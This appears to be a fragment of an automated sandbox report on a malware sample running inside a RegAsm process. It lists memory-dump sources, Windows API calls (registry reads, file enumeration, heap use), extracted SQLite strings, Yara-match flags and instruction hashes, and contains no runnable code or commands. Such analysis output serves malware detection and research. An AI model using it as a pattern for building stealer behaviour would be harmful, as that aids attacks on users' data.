                                                    • Source File: 00000002.00000002.3051781987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: File$CloseCreateHandleSize
                                                    • String ID:
                                                    • API String ID: 1378416451-0
                                                    • Opcode ID: d6cbb99f5314e23faf3fcb7a417c7da649c718395e1405f06033c3c258e6426e
                                                    • Instruction ID: b5f63f45aa5a973c207922594595ef1cee08961031f5671ccba5ec38916fb823
                                                    • Opcode Fuzzy Hash: d6cbb99f5314e23faf3fcb7a417c7da649c718395e1405f06033c3c258e6426e
                                                    • Instruction Fuzzy Hash: 1EF01D38A00208BBDB119F70EC09B8E7B76BB05755F21C261A551B51A0E7749B919B44
                                                    APIs
                                                    • GetProcessHeap.KERNEL32(00000000,00000104,80000001), ref: 00401069
                                                    • HeapAlloc.KERNEL32(00000000), ref: 00401070
                                                    • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 0040108A
                                                    • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,000000FF,000000FF), ref: 004010A5
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3051781987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Heap$AllocOpenProcessQueryValue
                                                    • String ID:
                                                    • API String ID: 3676486918-0
                                                    • Opcode ID: be49e086dc0d310c657e0ea36b61225587a38021f968e5eb5576e45f00ae361c
                                                    • Instruction ID: 93c56868f345bbfa7cecc9d1a6a005eb9f7e7e5940340002480c40e87bd2faf3
                                                    • Opcode Fuzzy Hash: be49e086dc0d310c657e0ea36b61225587a38021f968e5eb5576e45f00ae361c
                                                    • Instruction Fuzzy Hash: AAF0F479A4020DBFDF01AFA0EC0AB9D7BBAFB06745F105061F611A91A0D7719A909B00
                                                    APIs
                                                    • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?,Version: ,00425200), ref: 00411C70
                                                    • HeapAlloc.KERNEL32(00000000), ref: 00411C77
                                                    • GetLocalTime.KERNEL32(?), ref: 00411C84
                                                    • wsprintfA.USER32 ref: 00411CB1
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3051781987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Heap$AllocLocalProcessTimewsprintf
                                                    • String ID:
                                                    • API String ID: 1243822799-0
                                                    • Opcode ID: b01e69fe014143db8bda8cfbb55ef20ec2606d2adb4ae2357e78992565632fce
                                                    • Instruction ID: a03bda301cebd81dad816f1e8f5b399208d69082490908e68b74499f6324776c
                                                    • Opcode Fuzzy Hash: b01e69fe014143db8bda8cfbb55ef20ec2606d2adb4ae2357e78992565632fce
                                                    • Instruction Fuzzy Hash: 7FF0DAB9900119BFCB50EBE9DD09ABEB7FDBB0A746F001041FA41E5090E639CA90D771
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3059117906.000000001FA28000.00000020.00001000.00020000.00000000.sdmp, Offset: 1FA20000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1fa20000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: string or blob too big
                                                    • API String ID: 0-2803948771
                                                    • Opcode ID: e84fd25352fc7f2c29ffb22f09f5233b7b8bc11affb23a01a674585df608cb3c
                                                    • Instruction ID: d527213490591a45371e23b726d4a7d72f7a3862bbf872775c16710b4ee4b298
                                                    • Opcode Fuzzy Hash: e84fd25352fc7f2c29ffb22f09f5233b7b8bc11affb23a01a674585df608cb3c
                                                    • Instruction Fuzzy Hash: 43A13775D08B868FD7048E2A8C40756B7D2AF8A322F181B5DF8A1473E1E77CE485CB91
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3059117906.000000001FB86000.00000020.00001000.00020000.00000000.sdmp, Offset: 1FA20000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1fa20000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: %!.15g$-
                                                    • API String ID: 0-583212262
                                                    • Opcode ID: dc1494d6745a383f3205171fc4d3b2339f884954029a5074593761de272d05db
                                                    • Instruction ID: b9858daeaefeb2545c43ed182003ff6fd935d930d110e9ccb389e10f58c8237c
                                                    • Opcode Fuzzy Hash: dc1494d6745a383f3205171fc4d3b2339f884954029a5074593761de272d05db
                                                    • Instruction Fuzzy Hash: 9C915671A0C3468FD304CF6DD89179ABBE0EBC8304F54492DE989CB351E7B9D9098B92
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3059117906.000000001FA28000.00000020.00001000.00020000.00000000.sdmp, Offset: 1FA20000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1fa20000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: *$?
                                                    • API String ID: 0-2367018687
                                                    • Opcode ID: 9da71a3524c77659544f1d0f59fc65ef1df10318f96e009357288d1720866127
                                                    • Instruction ID: 978c43ab71f682fb3db8558fb6bc01b60924b34cccdcb51e43b8c9e790cf9cf3
                                                    • Opcode Fuzzy Hash: 9da71a3524c77659544f1d0f59fc65ef1df10318f96e009357288d1720866127
                                                    • Instruction Fuzzy Hash: ED7115B0A083528FD7108F29D98071BBBE6EF85710F3449ADE9C687301E335E945D7A2
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3059117906.000000001FA28000.00000020.00001000.00020000.00000000.sdmp, Offset: 1FA20000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1fa20000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: string or blob too big
                                                    • API String ID: 0-2803948771
                                                    • Opcode ID: 528e7ecfadcf3c52c5e43328e7c995fd6d062fb5faad0f27235a27fe997e825a
                                                    • Instruction ID: 9fb4b0e581e8bd51f64af8dcf338c94915c2cf5763a63d741277d8d05e45e06e
                                                    • Opcode Fuzzy Hash: 528e7ecfadcf3c52c5e43328e7c995fd6d062fb5faad0f27235a27fe997e825a
                                                    • Instruction Fuzzy Hash: 7D417B72D0434ACFE7108A38AC5179A7BD6AF51321F140A7CECA5533D2E62EE608C3D2
                                                    Strings
                                                    • winDelete, xrefs: 1FA3569C
                                                    • delayed %dms for lock/sharing conflict at line %d, xrefs: 1FA356D1
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3059117906.000000001FA28000.00000020.00001000.00020000.00000000.sdmp, Offset: 1FA20000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1fa20000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: delayed %dms for lock/sharing conflict at line %d$winDelete
                                                    • API String ID: 0-1405699761
                                                    • Opcode ID: af45c880441a13887795bb919ad7e61ac8f110d9a71f943ce3b4574aad305d0c
                                                    • Instruction ID: 1c610631cef860c2a35ebf9b6d19b91182aa3e21e52a3243cf3873d454c7d028
                                                    • Opcode Fuzzy Hash: af45c880441a13887795bb919ad7e61ac8f110d9a71f943ce3b4574aad305d0c
                                                    • Instruction Fuzzy Hash: 12316972E042338FDB102A3D9DC88D67759ABC0773F090562EB83C6381E72EE464E691
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3059117906.000000001FA28000.00000020.00001000.00020000.00000000.sdmp, Offset: 1FA20000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1fa20000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: string or blob too big
                                                    • API String ID: 0-2803948771
                                                    • Opcode ID: 797377d88d5067081eef42c14a3dd5de571a5567dd56f887ff8cf65a3228f108
                                                    • Instruction ID: aa4aaafa68f2766d911c0bfb8fc590fd18cee38b52b959698a07266f1c754ada
                                                    • Opcode Fuzzy Hash: 797377d88d5067081eef42c14a3dd5de571a5567dd56f887ff8cf65a3228f108
                                                    • Instruction Fuzzy Hash: CD315EB6D04358DBD7004924AC517A6B75A9B81326F180299F8556F2C2E37FFD16D3E0
                                                    APIs
                                                    • std::_Xinvalid_argument.LIBCPMT ref: 004101DC
                                                      • Part of subcall function 004247E0: std::exception::exception.LIBCMT ref: 004247F5
                                                      • Part of subcall function 004247E0: __CxxThrowException@8.LIBCMT ref: 0042480A
                                                      • Part of subcall function 004247E0: std::exception::exception.LIBCMT ref: 0042481B
                                                      • Part of subcall function 004103F3: std::_Xinvalid_argument.LIBCPMT ref: 0041043A
                                                    • memcpy.MSVCRT ref: 00410283
                                                    Strings
                                                    • invalid string position, xrefs: 004101D7
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3051781987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throwmemcpy
                                                    • String ID: invalid string position
                                                    • API String ID: 214693668-1799206989
                                                    • Opcode ID: e86a1713da9c421aad466737e1125156709f9dea92e3b751e974e07c267e572f
                                                    • Instruction ID: e364865db6849b0bbb6bb3712810e3608b22f82cda0164f9b002173d45244cba
                                                    • Opcode Fuzzy Hash: e86a1713da9c421aad466737e1125156709f9dea92e3b751e974e07c267e572f
                                                    • Instruction Fuzzy Hash: E6417E74A0020AEFCB04DF98D585AEEBBB1BB19300F504496E915AB351D774EE81DB98
                                                    Strings
                                                    • sqlite_stat1, xrefs: 1FB1DF30
                                                    • SELECT tbl,idx,stat FROM %Q.sqlite_stat1, xrefs: 1FB1DF4F
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3059117906.000000001FA28000.00000020.00001000.00020000.00000000.sdmp, Offset: 1FA20000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1fa20000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: SELECT tbl,idx,stat FROM %Q.sqlite_stat1$sqlite_stat1
                                                    • API String ID: 0-3572622772
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3059117906.000000001FB86000.00000020.00001000.00020000.00000000.sdmp, Offset: 1FA20000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1fa20000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: OsError 0x%lx (%lu)
                                                    • API String ID: 0-3720535092
                                                    APIs
                                                    • std::_Xinvalid_argument.LIBCPMT ref: 00410606
                                                      • Part of subcall function 004247E0: std::exception::exception.LIBCMT ref: 004247F5
                                                      • Part of subcall function 004247E0: __CxxThrowException@8.LIBCMT ref: 0042480A
                                                      • Part of subcall function 004247E0: std::exception::exception.LIBCMT ref: 0042481B
                                                    • memmove.MSVCRT ref: 00410684
                                                    Strings
                                                    • invalid string position, xrefs: 00410601
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3051781987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: std::exception::exception$Exception@8ThrowXinvalid_argumentmemmovestd::_
                                                    • String ID: invalid string position
                                                    • API String ID: 1659287814-1799206989
                                                    Strings
                                                    • DROP TABLE '%q'.'%q_node';DROP TABLE '%q'.'%q_rowid';DROP TABLE '%q'.'%q_parent';, xrefs: 1FA4F752
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3059117906.000000001FA28000.00000020.00001000.00020000.00000000.sdmp, Offset: 1FA20000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1fa20000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: DROP TABLE '%q'.'%q_node';DROP TABLE '%q'.'%q_rowid';DROP TABLE '%q'.'%q_parent';
                                                    • API String ID: 0-2071071404
                                                    Strings
                                                    • GetXStateFeaturesMask, xrefs: 1FC00E34
                                                    • InitializeCriticalSectionEx, xrefs: 1FC00E84
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3059117906.000000001FA21000.00000020.00001000.00020000.00000000.sdmp, Offset: 1FA20000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1fa20000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: GetXStateFeaturesMask$InitializeCriticalSectionEx
                                                    • API String ID: 0-4196971266
                                                    Strings
                                                    • SELECT %s WHERE rowid = ?, xrefs: 1FA7F017
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3059117906.000000001FA28000.00000020.00001000.00020000.00000000.sdmp, Offset: 1FA20000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1fa20000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: SELECT %s WHERE rowid = ?
                                                    • API String ID: 0-866778640
                                                    APIs
                                                    • StrCmpCA.SHLWAPI(?,00425240), ref: 00416562
                                                    • StrCmpCA.SHLWAPI(?,0042523C), ref: 00416578
                                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 004169C8
                                                    • FindClose.KERNEL32(000000FF), ref: 004169DC
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3051781987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Find$CloseFileNext
                                                    • String ID: &lA
                                                    • API String ID: 2066263336-185775853
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3059117906.000000001FA28000.00000020.00001000.00020000.00000000.sdmp, Offset: 1FA20000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1fa20000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: %s at line %d of [%.10s]$misuse
                                                    • API String ID: 0-2530468415